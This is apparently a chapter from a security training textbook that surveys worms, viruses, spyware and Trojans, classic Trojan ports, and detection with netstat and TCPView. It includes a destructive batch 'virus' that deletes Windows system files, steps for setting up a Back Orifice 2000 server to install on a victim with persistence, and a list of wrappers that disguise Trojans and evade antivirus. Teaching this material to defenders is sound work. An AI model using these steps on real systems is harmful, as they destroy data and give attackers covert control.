Chapter 2 - Types of malware

2.1 Worms A computer worm is a standalone malware computer program that replicates itself in order to spread to

other computers. On November 2, 1988, Robert Tappan Morris, a Cornell University computer science graduate student,

unleashed what became known as the Morris worm, disrupting a large number of computers then on the Internet, guessed at the time to be one tenth of all those connected.

Often, it uses a computer network to spread itself, relying on security failures on the target computer to access it.

Worms almost always cause at least some harm to the network, even if only by consuming bandwidth, whereas viruses almost always corrupt or modify files on a targeted computer.

2.1.1The Functioning of Computer Worms One of the main characteristics of worms is their inherent ability to replicate and spread across networks

extremely quickly. Most worms share certain features that help define how they work and what they can do:

o Do not require a host application to perform their activities.o Do not necessarily require any user interaction, direct or otherwise, to function. o Replicate extremely rapidly across networks and hosts.o Consume bandwidth and resources.

Worms can also perform some other functions:o Transmit information from a victim system back to another location specified by the designer.o Carry a payload, such as a virus, and drop off this payload on multiple systems rapidly.

With these abilities in mind, it is important to distinguish worms from viruses by considering a couple of key points:

o A worm can be considered a special type of malware that can replicate and consume memory, but at the same time it does not typically attach itself to other applications or software.

o A worm spreads through infected networks automatically and requires only that a host is vulnerable.

o A virus does not have this ability.

2.2 VIRUSES:- A computer virus is a piece of software that can “infect” other programs by modifying them. A virus carries in its instructional code the recipe for making perfect copies of itself. A computer virus has three parts:-

o Infection mechanism: The means by which a virus spreads, enabling it to replicate. The mechanism is also referred to as the infection vector.

o Trigger: The event or condition that determines when the payload is activated or delivered.o Payload: What the virus does, besides spreading. The payload may involve damage or may

involve benign but noticeable activity. Many potential actions can take place, such as these:

o Altering datao Infecting other programso Replicatingo Encrypting itselfo Transforming itself into another formo Altering configuration settings

o Destroying datao Corrupting or destroying hardware

2.2.1 Four phases:- Dormant phase: The virus is idle. The virus will eventually be activated by some event, such as a date,

the presence of another program or file, or the capacity of the disk exceeding some limit. Not all viruses have this stage.

Propagation phase: The virus places a copy of itself into other programs or into certain system areas on the disk. The copy may not be identical to the propagating version; viruses often morph to evade detection. Each infected program will now contain a clone of the virus, which will itself enter a propagation phase.

Triggering phase: The virus is activated to perform the function for which it was intended. As with the dormant phase, the triggering phase can be caused by a variety of system events, including a count of the number of times that this copy of the virus has made copies of itself.

Execution phase: The function is performed. The function may be harmless, such as a message on the screen, or damaging, such as the destruction of programs and data files.

2.2.2 The process of developing a virus:- Design—The author envisions and creates the virus. The author may choose to create the virus

completely from scratch or use one of the many construction kits that are available to create the virus of their choice.

Replication—Once deployed, the new virus spreads through replication: multiplying and then ultimately spreading to different systems. How this process takes place depends on the author’s original intent, but the process can be very rapid, with new systems becoming infected in short order.

Launch—The virus starts to do its dirty work by carrying out the task for which it was created (such as destroying data or changing a system’s settings). Once the virus activates through a user action or other predetermined action, the infection begins.

Detection—The virus is recognized as such after infecting systems for some period of time. During this phase, the nature of the infection is typically reported to antivirus makers, who begin their initial research into how the software works and how to eradicate it.

Incorporation—The antivirus makers determine a way to identify the virus and incorporate the process into their products through updates. Typically, the newly identified malware is incorporated into signature files, which are downloaded and installed by the antivirus application.

Elimination—Users of the antivirus products incorporate the updates into their systems and eliminate the virus.

NOTE:- It is important to realize that this process is not linear: It is a loop or cycle. When step 6 is reached, the whole process starts over at step 1 with another round of virus development.

2.2.3 Kinds of Viruses System or boot sector virus –

o It is designed to infect and place its own code into the master boot record (MBR) of a system.o Once this infection takes place, the system’s boot sequence is effectively altered; meaning the

virus or other code can be loaded before the system itself. o Post-infection symptoms such as startup problems, problems with retrieving data, computer

performance instability, and the inability to locate hard drives are all issues that may arise. Macro viruses –

o They take advantage of embedded languages such as Visual Basic for Applications (VBA). o In applications such as Microsoft Excel and Word, these macro languages are designed to

automate functions and create new processes.o The problem with these languages is that they lend themselves very effectively to abuse; in

addition, they can easily be embedded into template files and regular document files.

o Once the macro is run on a victim’s system, it can do all sorts of things, such as change a system configuration to decrease security or read a user’s address book and email to others (which happened in some early cases).

o A prime example of this type of virus is the Melissa virus of the late 1990s. Cluster viruses –

o They are another variation of the family tree that carries out its dirty work in yet another original way.

o This virus alters the file-allocation tables on a storage device, causing file entries to point to the virus instead of the real file.

o In practice, this means that when a user runs a given application, the virus runs before the system executes the actual file.

o Making this type of virus even more dangerous is the fact that infected drive-repair utilities cause problems of an even more widespread variety.

o Utilities such as ScanDisk may even destroy sections of the drive or eliminate files. Stealth or tunneling virus-

o It is designed to employ various mechanisms to evade detection systems. o Stealth viruses employ unique techniques including intercepting calls from the OS and returning

bogus or invalid responses that are designed to fool or mislead. Encryption viruses –

o They can scramble themselves to avoid detection. o This virus changes its program code, making it nearly impossible to detect using normal means.o It uses an encryption algorithm to encrypt and decrypt the virus multiple times as it replicates

and infects. o Each time the infection process occurs, a new encryption sequence takes place with different

settings, making it difficult for antivirus software to detect the problem. Cavity or file-overwriting viruses-

o They hide in a host file without changing the host file’s appearance, so detection becomes difficult.

o Many viruses that do this also implement stealth techniques, so you don’t see the increase in file length when the virus code is active in memory.

Sparse-infector viruses – o They avoid detection by carrying out their infectious actions only sporadically, such as on every

10th or 25th activation. o A virus may even be set up to infect only files of a certain length or type or that start with a

certain letter. Companion or camouflage virus –

o compromises a feature of OSs that enables software with the same name, but different extensions, to operate with different priorities.

o For example, you may have program.exe on your computer, and the virus may create a file called program.com.

o When the computer executes program.exe, the virus runs program.com before program.exe is executed.

o In many cases, the real program runs, so users believe the system is operating normally and aren’t aware that a virus was run on the system.

Logic bomb o They is designed to lie in wait until a predetermined event or action occurs.o When this event occurs, the bomb or payload detonates and carries out its intended or designed

action. o Logic bombs have been notoriously difficult to detect because they do not look harmful until

they are activated—and by then, it may be too late.

o In many cases, the bomb is separated into two parts: the payload and the trigger. o Neither looks all that dangerous until the predetermined event occurs.

File or multipartite viruses o infect systems in multiple ways using multiple attack vectors, hence the term multipartite. o Attack targets include the boot sector and executable files on the hard drive. o What makes such viruses dangerous and powerful weapons is that to stop them, you must

remove all of their parts. o If any part of the virus is not eradicated from the infected system, it can reinfect the system.

Shell viruses – o They are another type of virus where the software infects the target application and alters it. o The virus makes the infected program into a subroutine that runs after the virus itself runs.

Cryptoviruses - o hunt for files or certain types of data on a system and then encrypt it.o Then the victim is instructed to contact the virus creator via a special email address or other

means and pay a specified amount (ransom) for the key to unlock the files. Hoax –

o is not a true virus in the sense of the others discussed here, but we need to cover this topic because a hoax can be just as powerful and devastating as a virus.

o Hoaxes are designed to make the user take action even though no infection or threat exists.

2.2.4 Create a Virus

Method 1:Creating a Simple Virus

So, let’s write a simple virus. You need access to Notepad and bat2com, the latter of which you can find on the Internet.

Before you get started, here’s a warning: Do not execute this virus. This exercise is meant to be a proof of concept and for illustrative purposes only. Executing this code on your system could result in damage to your system that may require extensive time and skill to fix properly. With that said, follow these steps:

1. Create a batch file called virus.bat using Windows Notepad.2. Enter the following lines of code:

@echo offDel c:\windows\system32\*.*Del c:\windows\*.*

3. Save virus.bat.4. From the command prompt, use bat2com to convert virus.bat into virus.com.

Method 2:Another way to create a virus is to use a utility such as JPS Virus Maker. It is a simpleutility in which you pick options from a GUI and then choose to create a new executablefile that can be used to infect a host. Figure 8.1 shows the interface for JPS Virus Maker.

2.2.5 Researching Viruses If you need to investigate and analyze malware in addition to defending against it, you should know

about a mechanism known as a sheep-dip system. A sheep-dip system is a computer that is specifically configured to analyze files. The system typically is stripped down and includes only those services and applications needed to test

software to ascertain whether it is safe.

2.3 Spyware Spyware is a type of malware that is designed to collect and forward information regarding a victim’s

activities to an interested party. The application acts behind the scenes to gather this information without the user’s consent or

knowledge. The information gathered by spyware can be anything that the creator of the spyware feels is

worthwhile. Spyware has been used to target ads, steal identities, generate revenue, alter systems, and capture other

information.

2.3.1 Methods of Spyware Infection Peer-to-Peer Networks (P2P)

o This delivery mechanism has become very popular because of the increased number of individuals using these networks to obtain free software.

Instant Messaging (IM) o Delivering malicious software via IM is easy. o IM software has never had much in the way of security controls.

Internet Relay Chat (IRC) o IRC is a commonly used mechanism to deliver messages and software because of its widespread

use and the ability to entice new users to download software. Email Attachments

o With the rise of email as a communication medium, the practice of using it to distribute malware has also risen.

Physical Access o Once an attacker gains physical access, it becomes relatively easy to install spyware and

compromise the system. Browser Defects

o Many users forget or do not choose to update their browsers as soon as updates are released, so distribution of spyware becomes easier.

Freeware o Downloading software for free from unknown or untrusted sources can mean that you also

download something nastier, such as spyware. Websites Software is sometimes installed on a system via web browsing. When a user visits a given

website, spyware may be downloaded and installed using scripting or some other means. Software Installations

o One common way to install software such as spyware on a victim’s system is as part of another software installation.

o In these situations, a victim downloads a piece of software that they want, but packaged with it is a payload that is silently installed in the background.

o The victim may be told that something else is being installed on the system but may click through the installation wizard so quickly without reading anything that they miss the fact that additional software is being placed on their system.

2.4 Trojans One of the older and potentially widely misunderstood forms of malware is the Trojan. Trojan is a software application that is designed to provide covert access to a victim’s system. The malicious code is packaged in such a way that it appears harmless and thus gets around both the

scrutiny of the user and the antivirus or other applications that are looking for malware. Once on a system, its goals are similar to those of a virus or worm: to get and maintain control of the

system or perform some other task. A Trojan relies on these items:

o An overt channel is a communication path or channel that is used to send information or perform other actions. HTTP and TCP/IP are examples of communication mechanisms that can and do send information legitimately.

o A covert channel is a path that is used to transmit or convey information but does so in a way that is illegitimate or supposed to be impossible but is able to circumvent security. The covert channel violates security policy on a system.

2.4.1 Trojan Behaviors:- The CD drawer of a computer opens and closes. The computer screen changes, either flipping or inverting. Screen settings change by themselves. Documents print with no explanation. The browser is redirected to a strange or unknown web page. The Windows color settings change. Screen saver settings change. The right and left mouse buttons reverse their functions. The mouse pointer disappears. The mouse pointer moves in unexplained ways. The Start button disappears. Chat boxes appear. The Internet service provider (ISP) reports that the victim’s computer is running port scans.

People chatting with you appear to know detailed personal information about you. The system shuts down by itself. The taskbar disappears. Account passwords are changed. Legitimate accounts are accessed without authorization. Unknown purchase statements appear on credit card bills. Modems dial and connect to the Internet by themselves. Ctrl+Alt+Del stops working.

2.4.2 Operations that could be performed by a hacker on a target computer system include these: Stealing data Installing software Downloading or uploading files Modifying files Installing keyloggers Viewing the system user’s screen Consuming computer storage space Crashing the victim’s system

2.4.3 Types of Trojans include the following: Remote Access Trojans (RATs)

o Designed to give an attacker remote control over a victim’s system. Data Sending

o To fit into this category, a Trojan must capture some sort of data from the victim’s system, including files and keystrokes.

o Once captured, this data can be transmitted via email or other means if the Trojan is so enabled.o Keyloggers are common Trojans of this type.

Destructive o This type of Trojan seeks to corrupt, erase, or destroy data outright on a system.o In more extreme cases, the Trojan may affect the hardware in such a way that it becomes

unusable. Proxy

o Malware of this type causes a system to be used as a proxy by the attacker. o The attacker uses the victim’s system to scan or access another system or location. o The result is that the actual attacker is hard to find.

FTP o Software in this category is designed to set up the infected system as an FTP server. o An infected system becomes a server hosting all sorts of information, which may include illegal

content of all types. Security Software Disablers

o A Trojan can be used as the first step in further attacks if it is used to disable security software.

2.4.4 Detecting Trojans and Viruses A Trojan can be detected in many ways. Port scanning can prove very effective if you know what to

look for. Because a Trojan is used to allow access through backdoors or covert channels, a port must be opened to

allow this communication. A port scan using a tool such as Nmap reveals these ports and allows you to investigate them further.

The following ports are used for classic Trojans:Back Orifice—UDP 31337 or 31338

Back Orifice 2000—TCP/UDP 54320/54321Beast—TCP 6666Citrix ICA—TCP/UDP 1494Deep Throat—UDP 2140 and 3150Desktop Control—UDP NALoki—Internet Control Message Protocol (ICMP)NetBus—TCP 12345 and 12346Netcat—TCP/UDP (any)NetMeeting Remote—TCP 49608/49609pcAnywhere—TCP 5631/5632/65301Reachout—TCP 43188Remotely Anywhere—TCP 2000/2001Remote—TCP/UDP 135-1139Whack-a-Mole—TCP 12361 and 12362NetBus 2 Pro—TCP 20034GirlFriend—TCP 21544Masters Paradise—TCP 3129, 40421, 40422, 40423, and 40426Timbuktu—TCP/UDP 407VNC—TCP/UDP 5800/5801

2.4.5 Detecting Trojans and Viruses

Method 1 - Using Netstat to Detect Open Ports This tool can list the ports that are open and listening for connections on the system. To use netstat, follow these steps in Windows:

1. Open a command prompt.2. At the command line, enter netstat –an (note that the command is case sensitive).3. Observe the results.

You should see that several ports are open and listening. You may not recognize all the numbers, but that doesn’t mean they are malicious. You may wish to research the open ports (they vary from system to system) to see what each relates to.

Method 2 - Using TCPView to Track Port Usage Netstat is a powerful tool, but one of its shortcomings is the fact that it is not real time. TCPView track port usage in real time. download it from www.microsoft.com. To use TCPView, follow these steps:

1. In Windows, run the tcpview.exe executable.2. Observe the results in the GUI.3. With TCPView still running, open a web browser, and go to www.wiley.com.4. In TCPView, notice the results and that new entries have been added.5. In the browser, go to www.youtube.com (or some other site that streams video or audio), and play a video or piece of content.6. In TCPView, watch how the entries change as ports are opened and closed. Observe for a minute or two, and note how the display updates.7. Close the web browser.8. In TCPView, observe how the display updates as some connections and applications are removed.

2.4.6 Tools for Creating Trojans

Let Me Rule

o A remote access Trojan authored entirely in Delphi. It uses TCP port 26097 by default. RECUB

o Remote Encrypted Callback Unix Backdoor (RECUB) features RC4 encryption, code injection, and encrypted ICMP communication requests. It demonstrates a key trait of Trojan software—small size—as it tips the scale at less than 6 KB.

Phatbot o Capable of stealing personal information including email addresses, credit card numbers, and

software licensing codes. It returns this information to the attacker or requestor using a P2P network. Phatbot can also terminate many antivirus and software based firewall products, leaving the victim open to secondary attacks.

Amitis o Opens TCP port 27551 to give the hacker complete control over the victim’s computer.

Zombam.B o Allows the attacker to use a web browser to infect a computer. It uses port 80 by default and is

created with a Trojan-generation tool known as HTTPRat. Much like Phatbot, it also attempts to terminate various antivirus and firewall processes.

Beast o Uses a technique known as Data Definition Language (DDL) injection to inject itself into an

existing process, effectively hiding itself from process viewers. Hard-Disk Killer

o A Trojan written to destroy a system’s hard drive. When executed, it attacks a system’s hard drive and wipes it in just a few seconds.

Back Orifice 2000 (BO2K): o BO2K is a lot like other major file synchronization and remote control packages that are on the

market as commercial products. Except that BO2K is smaller, faster, free, and very, very extensible.

BO2K consists of two software components: a client and a server. To use the BO2K server, the configuration is as follows:

1. Start the BO2K Wizard, and click Next when the wizard’s splash screen appears.2. When prompted by the wizard, enter the server executable to be edited.3. Choose the protocol over which to run the server communication. The typical choice is to

use TCP as the protocol, due to its inherent robustness. UDP is typically used if a firewall or other security architecture needs to be traversed.

4. The next screen asks what port number will be used. Port 80 is generally open, and so it’s most often used, but you can use any open port.

5. In the next screen, enter a password that will be used to access the server. Note that passwords can be used, but you can also choose open authentication—that means anyone can gain access without having to supply credentials of any kind.

6. When the wizard finishes, the server-configuration tool is provided with the information you entered.

7. The server can be configured to start when the system starts up. This allows the program to restart every time the system is rebooted, preventing the program from becoming unavailable.

8. Click Save Server to save the changes and commit them to the server. Once the server is configured, it is ready to be installed on the victim’s system. list of features :

1. Address book–style server list2. Functionality that can be extended via the use of plug-ins

3. Multiple simultaneous server connections4. Session-logging capability5. Native server support6. Keylogging capability7. Hypertext Transfer Protocol (HTTP) file system browsing and transfer8. Microsoft Networking file sharing9. Remote registry editing10. File browsing, transfer, and management11. Plug-in extensibility12. Remote upgrading, installation, and uninstallation13. Network redirection of Transfer Control Protocol/Internet Protocol (TCP/IP) connections14. Ability to access console programs such as command shells through Telnet15. Multimedia support for audio/video capture and audio playback16. Windows NT registry passwords and Win9x screen saver password dumping17. Process control, start, stop, and list18. Multiple client connections over any medium19. GUI message prompts

2.4.7 Distributing Trojans

Using Wrappers to Install TrojansUsing wrappers, attackers can take their intended payload and merge it with a harmless executable to create a single executable from the two. wrapper programs are the following:

1. EliteWrap – a. It includes the ability to perform redundancy checks on merged files to make sure the process

went properly and the ability to check if the software will install as expected. b. The software can be configured to the point of letting the attacker choose an installation

directory for the payload. c. Software wrapped with EliteWrap can be configured to install silently without any user

interaction.2. Saran Wrap –

a. It is specifically designed to work with and hide Back Orifice. b. It can bundle Back Orifice with an existing program into what appears to be a standard program

using Install Shield.3. Trojan Man-

a. It merges programs and can encrypt the new package in order to bypass antivirus programs.4. Teflon Oil Patch-

a. It is designed to bind Trojans to a specified file in order to defeat Trojan-detection applications.5. Restorator –

a. It was designed with the best of intentions but is now used for less-thanhonorable purposes. b. It can add a payload to, for example, a seemingly harmless screen saver, before it is forwarded to

the victim.6. Firekiller 2000-

a. It is designed to be used with other applications when wrapped. b. This application disables firewall and antivirus software. c. Programs such as Norton Antivirus and McAfee VirusScan were vulnerable targets prior to

being patched.

2.4.8 Trojan Construction Kits1. Trojan Construction Kit

One of the best examples of a relatively easy-to-use but potentially destructive tool.

This kit is command-line based, which may make it a little less accessible to the average person, but it is nonetheless very capable in the right hands.

With a little effort, it is possible to build a Trojan that can engage in destructive behavior such as destroying partition tables, master boot records (MBRs), and hard drives.

2. Senna Spy Another Trojan-creation kit that provides custom options, such as file transfer, executing DOS

commands, keyboard control, and list and control processes.

3. Stealth Tool A program used not to create Trojans but to assist them in hiding. In practice, this tool is used to alter the target file by moving bytes, changing headers, splitting files, and

combining files.